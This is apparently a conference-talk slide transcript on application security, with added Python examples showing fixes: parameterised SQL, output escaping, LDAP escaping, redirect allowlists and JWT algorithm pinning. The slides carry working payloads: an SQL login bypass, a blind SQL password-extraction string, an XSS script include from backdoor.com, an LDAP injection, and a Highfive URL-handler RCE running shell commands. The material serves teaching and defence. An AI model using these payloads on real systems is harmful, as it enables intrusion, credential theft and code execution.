
AOEconf17: Application Security

AOEconf17 talk "Application Security" by Bastian Ike.

  1. Application Security, AOE Conf 2017
  2. What is Application Security?
  3. Application Security
     • Security in software
     • Not management security, perimeter security, etc.
     • Possible attack vectors
     • How to prevent issues
  4. Attack vectors
  5. Code Execution: make a system execute arbitrary code
  6. Buffer Overflows
     • Assembler code injected into memory
     • 1996, Aleph One, "Smashing the Stack for Fun and Profit"
     • Possible by overflowing a program's memory with controlled data
  7. SQL Injection
     • Execute arbitrary SQL code
     • Possible by interpolating user-submitted data without proper escaping
     • Can be used to read/write files on the DB server
  8. Cross-Site Scripting
     • Execute arbitrary JavaScript in a privileged context
     • Executed on a client's machine
     • Privileged context: browser (domain/cookies)
     • Steal/modify cookies
     • AJAX requests to privileged areas
  9. Cryptography: attack cryptographic measures for confidentiality and integrity
  10. Signatures
     • Fake signatures/tokens for unauthorised access
  11. Encryption
     • Break encryption
     • Missing encryption
     • Broken encryption, example: Bleichenbacher RSA
  12. Business Logic: make legitimate code behave in an unintended way
  13. Race Conditions
     • Re-order execution flows to change an operation's result
  14. Exploit basics
  15. SQL Injection
     • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}";
     • Username: Bastian
     • Password: Sesame098
     • Query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
  16. SQL Injection
     • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}";
     • Username: Bastian
     • Password: " OR 1=1 -- x
     • Query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x";
  17. SQL Injection
     • Query: SELECT * FROM logs WHERE token="${TOKEN}";
     • Token: a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),0,1) = 'a', SLEEP(5), 0) -- x
     • Query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),0,1) = 'a', SLEEP(5), 0) -- x";
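The login bypass from slides 15 and 16, and the fix the talk implies (no raw interpolation), as an added Python example that is not part of the talk. It uses an in-memory SQLite table with constructed sample rows; SQLite string literals are single-quoted, so the slide's `" OR 1=1 -- x` value appears here as `' OR 1=1 -- x`. The same bound-parameter fix also defeats the time-based token payload on slide 17, because the payload can then only ever be compared as a value.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    # Constructed sample data, not from the talk. Plaintext passwords are used
    # only to keep the sample short; real systems store password hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("Bastian", "Sesame098"), ("admin", "example-admin-pw")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # The slide's pattern: user input spliced into the statement text.
    # SQLite string literals are single-quoted, so the slide's double quotes
    # become single quotes here; the structure of the bypass is identical.
    query = (
        f"SELECT username FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Bound parameters: the values travel separately from the statement, so a
    # quote or a comment marker in the input is data, never SQL syntax.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(query, (username, password))]


def demo() -> dict:
    conn = make_demo_db()
    bypass = "' OR 1=1 -- x"  # slide 16's password value, single-quote form
    return {
        "vulnerable_correct_login": login_vulnerable(conn, "Bastian", "Sesame098"),
        "vulnerable_with_bypass": sorted(login_vulnerable(conn, "Bastian", bypass)),
        "safe_with_bypass": login_safe(conn, "Bastian", bypass),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the bypass value, the interpolated statement becomes `... AND password='' OR 1=1 -- x'`: the `OR 1=1` matches every row and `--` comments out the dangling quote, so the vulnerable login returns both users while the parameterised one returns nothing.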
  18. Cross-Site Scripting
     • Template: <a href="${page}">You are here</a>
     • URL: http://example.com/page=hello
     • Template: <a href="hello">You are here</a>
  19. Cross-Site Scripting
     • Template: <a href="${page}">You are here</a>
     • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script>
     • Template: <a href=""><script src="http://backdoor.com/x.js"></script>">You are here</a>
  20. Cross-Site Scripting
     • Code runs in the browser of whoever opens the link
     • Access to cookies and LocalStorage
     • Can send requests and read their results (emulate administrator behaviour)
     • Change page look/behaviour (steal passwords, etc.)
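The template from slides 18 and 19 rendered both ways, as an added Python example that is not from the talk: raw interpolation, which lets the `page` value close the `href` attribute, beside attribute-context output encoding with `html.escape`, which keeps the value inside the attribute. The `is_single_anchor` check is a demo-only helper, not a real HTML parser.

```python
from html import escape

# The template from the slide; {page} stands for the ${page} placeholder.
PAGE_TEMPLATE = '<a href="{page}">You are here</a>'

# The two values of the page parameter shown on the slides.
BENIGN = "hello"
MALICIOUS = '"><script src="http://backdoor.com/x.js"></script>'


def render_vulnerable(page: str) -> str:
    # Raw interpolation: a double quote in the value terminates the href
    # attribute, and whatever follows is parsed as new markup.
    return PAGE_TEMPLATE.format(page=page)


def render_escaped(page: str) -> str:
    # Output encoding for the HTML attribute context: & < > " and ' become
    # entities, so the value can neither end the attribute nor open a tag.
    # Escaping alone does not make a javascript: URL in href harmless; that
    # needs URL validation (scheme and host checks) in addition.
    return PAGE_TEMPLATE.format(page=escape(page, quote=True))


def is_single_anchor(rendered: str) -> bool:
    # Demo-only check: the browser should see one <a> element and nothing
    # else, so exactly two tag openers and no script tag.
    return rendered.count("<") == 2 and "<script" not in rendered.lower()
```

The rule this illustrates is that encoding has to match the output context: what is correct inside a quoted attribute differs from what is needed in element text, in a URL, or inside a script block.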
  21. Exploit samples
  22. Mattermost LDAP Injection
     • https://mattermost/api/v3/users/login
     • login_id: username)(givenName=test*
     • password: ""
     • Response:
       • 401: OK, query successful
       • 50x: Error, query failed
  23. Mattermost LDAP Injection
  24. Mattermost LDAP Injection
  25. Mattermost LDAP Injection
  26. Mattermost LDAP Injection
     • Prevention: properly escape characters which might be interpreted by LDAP
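The prevention on slide 26 carried out, as an added Python example that is not Mattermost's code: RFC 4515 escaping for values placed in an LDAP search filter, applied to the `login_id` value from slide 22. The `uid` attribute name is an assumption made for the example; the real attribute is a configuration setting.

```python
# Escaping for values placed inside an LDAP search filter (RFC 4515). The
# characters that carry meaning in filter syntax are replaced by a backslash
# and their two-digit hex code; everything else passes through unchanged.
LDAP_FILTER_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}


def escape_ldap_filter_value(value: str) -> str:
    # Character-by-character mapping, so the backslash added for one
    # character is never re-escaped by a later pass.
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_vulnerable(login_id: str) -> str:
    # The interpolation pattern behind the slide: a ')' in the login id
    # closes the uid clause and the remainder becomes filter syntax.
    # 'uid' is an assumed attribute name; the real attribute is configurable.
    return f"(uid={login_id})"


def login_filter_safe(login_id: str) -> str:
    return f"(uid={escape_ldap_filter_value(login_id)})"


def clause_count(ldap_filter: str) -> int:
    # A single equality filter contains exactly one '('; escaped parentheses
    # appear as \28 and \29 and are not counted.
    return ldap_filter.count("(")
```

With the slide's value, the unescaped filter turns into two clauses, `(uid=username)(givenName=test*)`, while the escaped form stays one clause whose value happens to contain parentheses and an asterisk. Values that go into a distinguished name instead of a filter need the separate RFC 4514 escaping rules.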
  27. Highfive RCE
     • Target: URL handler highfive://
     • Possible arguments: ?domain=, ?protocol=
  28. Highfive RCE
     • Diagram: privileged vs. non-privileged context (display web pages; execute processes, etc.)
     • Highfive Sandbox (NW.js)
     • Whitelist: https://highfive.com, https://dev.highfive.com
  29. Highfive RCE
     • highfive://test.com.a/?domain=alert(require('child_process').execSync('hostname;echo;id').toString())//&protocol=javascript
     • Starts Highfive on a privileged initial domain
     • Redirects to: protocol + '://' + domain + path
     • Becomes: javascript://alert(require('child_process').execSync('hostname;echo;id').toString())//something
  30. Highfive RCE
     • Redirect to javascript:// does not change the sandbox
     • Works on any operating system
     • Thank you JavaScript 😙
  31. Highfive RCE
     • Prevention: whitelist redirect targets
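The prevention on slide 31 as an added Python example, not Highfive's code: the redirect URL is still assembled from `protocol`, `domain` and `path` as slide 29 describes, but it is only followed when its scheme is `https` and its host matches one of the two whitelisted hosts from slide 28 exactly. Function names and the `guarded_redirect` return convention are assumptions of the example.

```python
from urllib.parse import urlsplit

# Allowed redirect targets, taken from the whitelist on the slide. Hosts are
# matched exactly; only https is accepted as a scheme.
ALLOWED_HOSTS = frozenset({"highfive.com", "dev.highfive.com"})
ALLOWED_SCHEMES = frozenset({"https"})


def redirect_target_allowed(url: str) -> bool:
    """Return True only for an https URL whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # rejects javascript:, file:, data:, plain http:, ...
    if parts.username is not None or parts.password is not None:
        return False  # no userinfo tricks such as https://highfive.com@other/
    host = parts.hostname or ""
    return host in ALLOWED_HOSTS  # exact match, so highfive.com.evil fails


def build_redirect(protocol: str, domain: str, path: str) -> str:
    # The construction the slide describes: protocol and domain come from the
    # highfive:// URL's query parameters, so the caller controls the scheme.
    return f"{protocol}://{domain}{path}"


def guarded_redirect(protocol: str, domain: str, path: str):
    # Build the URL as before, but refuse to follow it unless it passes the
    # allowlist. Returns the URL to load, or None to abort the redirect.
    url = build_redirect(protocol, domain, path)
    return url if redirect_target_allowed(url) else None
```

Checking the scheme is what closes the `javascript:` case from slide 30; the exact host match is what stops a whitelist check from being satisfied by a host that merely contains or ends with a whitelisted name.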
  32. JWT Null Tokens
  33. JWT Null Tokens
  34. JWT Null Tokens
  35. JWT Null Tokens
  36. JWT Null Tokens
     • Prevention: do not allow null signature algorithms
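The prevention on slide 36 in code, as an added Python example that does not come from the talk or from any JWT library: a verifier that fixes the algorithm itself (HS256) and rejects any token whose header names another algorithm, beside the flawed verifier pattern that lets the token's header choose and so treats `alg: none` as "nothing to check". The key, the claims and `alg_none_token` are constructed test inputs.

```python
import base64
import hashlib
import hmac
import json


class InvalidToken(Exception):
    """Raised for any token the verifier refuses to accept."""


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact JWT signed with HMAC-SHA256."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"},
                                       separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(signature)}"


def verify_hs256(token: str, key: bytes) -> dict:
    """Verify a token, accepting HS256 only.

    The algorithm is fixed by the verifier rather than read from the token:
    a header claiming alg "none" (or anything else) is rejected before the
    signature is even examined, which is the prevention the slide names.
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError) as exc:
        raise InvalidToken("malformed token") from exc
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise InvalidToken("algorithm not allowed")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak via timing.
    if not hmac.compare_digest(expected, signature):
        raise InvalidToken("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def verify_trusting_header(token: str, key: bytes) -> dict:
    """The flawed pattern behind "null tokens": let the token pick its algorithm.

    When the header says "none", this verifier treats the token as unsigned
    and returns the claims without any check. Kept only as the contrast case.
    """
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(payload_b64))
    return verify_hs256(token, key)


def alg_none_token(claims: dict) -> str:
    """Constructed test input: a token declaring alg "none" with an empty signature."""
    header = _b64url_encode(b'{"alg":"none","typ":"JWT"}')
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{payload}."
```

The design point is that the verifier's expected algorithm is part of its configuration, not of the untrusted input; the same applies when a service accepts several algorithms, where the list of accepted ones is fixed server-side and the header value is only compared against it.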
  37. Preventive actions
  38. Finding security issues
     • Code reviews
     • Curiosity
     • (sometimes: automated scanners)
  39. Stay up to date
  40. React fast
  41. React fast
     • Escalation plan for security incidents
     • Fast deployment strategies
     • Firewall setup to cut off possibly infected systems
     • Snapshot infrastructure for later analysis
  42. Thank you :) Questions?
